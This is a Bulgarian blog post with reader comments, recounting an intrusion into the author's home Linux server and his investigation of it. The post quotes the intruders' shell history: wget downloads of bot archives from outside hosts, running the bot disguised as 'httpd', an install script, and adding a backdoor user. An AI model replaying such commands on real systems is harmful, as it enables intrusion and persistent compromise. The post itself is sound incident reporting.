Днес нетипично за мен, реших да се логна като root и гледам last login from prag164.server4you.de и то от снощи. Викам си, бре хакнали са ме, ама нищо не бях усетил, май не са трили нищо (дано, още не съм разследвал всичко). Пуснах един netstat-tupan и гледам някакъв процес слуша на 58 хиляди и някой порт с име httpd и го kill-нах. Освен това май имаше и един ssh тунел или просто увиснала сесия, но и нея убих преди да определя точно. Започнах да търся какво са правили.
#last koders pts/0 213.193.222.30 Sun May 1 22:09 - 22:10 (00:01) koders pts/0 213.193.222.30 Sun May 1 21:14 - 21:14 (00:00) ifos vc/3 Sun May 1 21:04 - 00:03 (02:58) iko vc/4 Sun May 1 17:14 still logged in iko vc/8 Sun May 1 17:13 still logged in koders pts/0 prag164.server4y Sun May 1 16:24 - 16:30 (00:06) root pts/1 prag164.server4y Sun May 1 16:17 - 16:24 (00:06) root pts/0 prag164.server4y Sun May 1 16:16 - 16:19 (00:03)
Яяя дори са си направили потребител koders без много да му мислят. Дори си има и home директория. Изтрих koders от /etc/passwd и после един преглед на .bash_history
# cat .bash_history cd /var/tmp cd .bash ls wget www.onhelp.go.ro/dns.tgz cd .. mkdir .a cd .a wget www.onhelp.go.ro/dns.tgz ps -x ps -aux tar -zxvf dns.tgz cd dns mv bot httpd chmod 777 httpd export PATH="." httpd wget http://heanet.dl.sourceforge.net/sourceforge/undernet-ircu/ircu2.10.11.07.tar.gz ps -aux kill -9 5167 cd /var/tmp ls ls -a cd .a ls cd dns export PATH="." httpd exit
Отивам в /usr/tmp и доколкото разбрах са си компилирали някъв irc bot emergymech. От тази им постъпка си мисля, че са просто разни script kiddies, които се хвалят в IRC с всяка пробита машина. Това което ме притеснява, е че са влизали като root. Не са чистили много логове (може би хич) и редовете от .bash_history, които не са мои са :
[B [B w cd /var/tmp mkdir .bash wget www.filiasi.com/thug.tgz wget www.filiasi.com/tupac.tgz tar -zxvf tar -zxvf tupac.tgz cd muie id ./install adduser koders passwd koders
Влизали са от два компютъра 62.75.224.165 (prag164.server4you.de), което е в Германия и 213.193.222.30, което е в Холандия. Видях конфигурацията на бот-а : канал #OnHelp в Undernet. Влезнах там, но се задържах само няколко секунди, докато някой ми каза IkO_, say a и получих бан. Не се занимавах повече, освен че видях инфото на този, които ме изрита и там се рекламираше сайт www.koderS.biz. От този сайт, и малко с помощта на Йонов, защото нямам photoshop, видях че най-вероятно са румънци, което малко ме учуди, защото ги мислех за холандци.
Честно казано цялата работа, дори малко ме ласкае, защото не вярвах, че моята домашна машинка, на мизерна връзка, може да е приманлива цел за проникване. Лошото, е че не разбрах точно как са влезнали първоначално. Имам пуснати OpenSSH 4.0p1-1 и Apache 2.0.54-1, и двете от пакети на ArchLinux, където всичко по принцип е най-последна версия. Другия вариант е да са ми познали root паролата, която беше нормална английска дума. Сканирано ми е Apache-то за разни популярни директории и файлове, но на всичко е върнало 404, освен на нормания GET. Мисля си, да не е някой модул за него ?!? Или да има exploit за последната версия на OpenSSH ?!?
п.с. сега като препрочитам виждам, че бота са го свалили точно от румънски сайт, което потвърждава теорията, че са румънци. Дано не ме ядосат повече, защото не ми се занимава с глупости. Мислех, че това минал период за мен. Дано да остане така. За сега не мисля да им играя по свирката.
Ха, честито! 🙂
Ице всъщност това mac-a не ми го отвори с фотошоп… използвах openoffice.
Мда, прав си 🙂 Тогава съм се заблудил защото започва с adobe photoshop нещо си. А сега като го записах и file си каза, че е обикновен JPEG 🙂 А и ти тогава не каза нещо специално и си помислих, че си го отворил с photoshop-а.
“Другия вариант е да са ми познали root паролата, която беше нормална английска дума.”
Мдам. Грешка номер 1.
Съвет: не се задоволявай с преинсталация на какъвто и да е пакет. Започни на чисто. Не вярвай на нито един файл в тази файлова система.